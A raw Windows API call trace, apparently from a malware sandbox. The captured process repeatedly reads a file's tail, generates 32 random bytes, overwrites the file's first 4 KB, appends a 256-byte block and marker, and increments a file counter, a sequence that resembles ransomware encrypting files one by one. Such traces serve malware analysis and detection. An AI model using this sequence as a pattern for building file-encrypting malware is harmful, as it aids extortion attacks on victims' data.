GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.341] GetProcessHeap () returned 0x280000 [0076.341] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.341] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.342] GetProcessHeap () returned 0x280000 [0076.342] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.342] GetProcessHeap () returned 0x280000 [0076.343] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.343] GetProcessHeap () returned 0x280000 [0076.343] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.343] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.343] WriteFile (in: hFile=0x7ec, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.343] WriteFile (in: hFile=0x7ec, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.344] GetProcessHeap () returned 0x280000 [0076.344] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0076.344] GetProcessHeap () returned 0x280000 [0076.344] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.344] GetProcessHeap () returned 0x280000 [0076.344] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.344] CloseHandle (hObject=0x7ec) returned 1 [0076.345] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 27 [0076.345] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.345] ReadFile (in: hFile=0x7f0, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.345] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.345] GetProcessHeap () returned 0x280000 [0076.345] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.345] GetProcessHeap () returned 0x280000 [0076.345] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.345] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.345] GetProcessHeap () returned 0x280000 [0076.345] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0076.345] ReadFile (in: hFile=0x7f0, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.607] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.607] WriteFile (in: hFile=0x7f0, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.607] GetProcessHeap () returned 0x280000 [0076.607] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.607] GetProcessHeap () returned 0x280000 [0076.607] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.607] GetProcessHeap () returned 0x280000 [0076.607] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.607] GetProcessHeap () returned 0x280000 [0076.607] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.607] GetProcessHeap () returned 0x280000 [0076.607] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.608] GetProcessHeap () returned 0x280000 [0076.608] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.608] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.609] GetProcessHeap () returned 0x280000 [0076.609] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.609] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x1f8) returned 0x7dc1440 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.610] GetProcessHeap () returned 0x280000 [0076.610] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.611] GetProcessHeap () returned 0x280000 [0076.611] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.612] SetFilePointerEx (in: hFile=0x7f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.612] WriteFile (in: hFile=0x7f0, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.612] WriteFile (in: hFile=0x7f0, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.612] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0076.612] GetProcessHeap () returned 0x280000 [0076.613] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.613] GetProcessHeap () returned 0x280000 [0076.613] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.613] CloseHandle (hObject=0x7f0) returned 1 [0076.614] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 28 [0076.615] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.615] ReadFile (in: hFile=0x7f4, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.615] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.615] GetProcessHeap () returned 0x280000 [0076.615] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.615] GetProcessHeap () returned 0x280000 [0076.615] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.615] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.615] GetProcessHeap () returned 0x280000 [0076.615] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.615] ReadFile (in: hFile=0x7f4, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.675] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.675] WriteFile (in: hFile=0x7f4, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.675] GetProcessHeap () returned 0x280000 [0076.675] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.675] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 